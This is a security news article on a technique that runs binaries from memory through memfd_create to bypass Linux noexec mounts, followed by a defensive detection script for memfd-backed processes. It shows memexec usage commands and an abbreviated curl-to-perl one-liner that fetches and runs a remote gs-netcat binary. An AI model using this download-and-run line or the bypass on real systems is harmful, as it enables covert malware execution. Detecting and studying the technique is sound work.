A method of bypassing protection through ordinary scripts has been revealed.
Researchers have discovered a new way to bypass the noexec mount flag in Linux, allowing arbitrary binaries to be executed even on partitions where execution is prohibited. This is possible with Perl, Bash and PHP scripts, which do not require root privileges and allow binaries to be downloaded directly from the Internet and executed, bypassing the noexec restriction.
One of the key aspects is that the binary does not have to be marked executable (+x) and can sit on a partition mounted with noexec. The technique therefore still works when every writable partition, including /dev/shm, is mounted with the -o noexec option, and in environments where PHP restricts the use of the 'exec' family of functions.
The technique is based on the memfd_create and execveat system calls: the binary is written into an anonymous in-memory file and executed from that file descriptor, so it never has to exist as an executable file on a filesystem. As the researchers note, the approach also works in environments where Bash and PHP are not allowed to issue system calls directly, using an updated variant of the method to get around that restriction.
The Perl example shows how the 'id' command can be executed this way without root privileges:
Code:
source memexec-perl.sh
cat /usr/bin/id | memexec -u
On Bash, this can be done in the following way:
Code:
source memexec-bash.sh
cat /usr/bin/id | memexec
An interesting feature of the method is the ability to load binary files directly from the Internet into RAM and execute them while noexec is in effect. Attackers can use this to download and execute malware silently via commands like:
Code:
curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | perl -efor(319,279){...}
The method also bypasses restrictions on command execution in PHP using similar scripts, which is a serious weakness for systems that rely on such restrictions to protect against malicious code.
The researchers continue to analyze the approach and its possible implications for the security of Linux systems, emphasizing the importance of implementing additional security measures to prevent the use of such a method in real-world attacks. We also recommend that you check which system calls are reachable and limit their use, especially in security-sensitive environments.
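A process started from a memfd_create() descriptor leaves a recognisable artefact: its /proc/<pid>/exe symlink resolves to "/memfd:<name> (deleted)" instead of a path on a filesystem. The following detection script is an added example written for this page, not code from the researchers; it walks /proc, flags processes whose executable is memfd-backed, and includes a constructed fake /proc tree (build_demo_proc, a hypothetical helper) so it can be exercised offline.

```python
import os
import re
import tempfile
from typing import List, NamedTuple, Optional

# /proc/<pid>/exe of a process executed from an anonymous memfd (memfd_create
# followed by execveat/fexecve) reads "/memfd:<name> (deleted)". A binary run
# from a normal (even noexec-mounted) path resolves to that path instead.
MEMFD_EXE = re.compile(r"^/memfd:(?P<name>.*?) \(deleted\)$")


class Finding(NamedTuple):
    pid: int
    comm: str
    exe: str
    memfd_name: str


def classify_exe(link_target: str) -> Optional[str]:
    """Return the memfd name when link_target is a memfd-backed executable, else None."""
    m = MEMFD_EXE.match(link_target)
    return m.group("name") if m else None


def scan_proc(proc_root: str = "/proc") -> List[Finding]:
    """List processes under proc_root whose main executable lives only in memory."""
    findings: List[Finding] = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # skip /proc/self, /proc/sys, ... ; only PID directories matter
        pid = int(entry)
        try:
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
            with open(os.path.join(proc_root, entry, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            # Process exited between listdir and readlink, or the scan runs
            # unprivileged and may not read another user's exe link.
            continue
        name = classify_exe(exe)
        if name is not None:
            findings.append(Finding(pid, comm, exe, name))
    return findings


def build_demo_proc() -> str:
    """Constructed fake /proc tree (hypothetical data, not a real capture) for offline testing."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    # PID 4242: a perl interpreter re-executed from an in-memory file
    os.makedirs(os.path.join(root, "4242"))
    os.symlink("/memfd:payload (deleted)", os.path.join(root, "4242", "exe"))
    with open(os.path.join(root, "4242", "comm"), "w") as fh:
        fh.write("id\n")
    # PID 1337: an ordinary process backed by a file on disk
    os.makedirs(os.path.join(root, "1337"))
    os.symlink("/usr/bin/sleep", os.path.join(root, "1337", "exe"))
    with open(os.path.join(root, "1337", "comm"), "w") as fh:
        fh.write("sleep\n")
    os.makedirs(os.path.join(root, "self"))  # non-numeric entry, must be skipped
    return root


if __name__ == "__main__":
    for f in scan_proc():
        print(f"pid={f.pid} comm={f.comm} exe={f.exe!r} memfd_name={f.memfd_name!r}")
```

Run it as root (or as the user owning the suspect processes) for full coverage, since /proc/<pid>/exe of other users' processes is not readable unprivileged. The memfd name is attacker-controlled and can be empty or chosen to look innocuous, so the match is on the "/memfd:" prefix plus the " (deleted)" suffix, not on the name itself.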
Source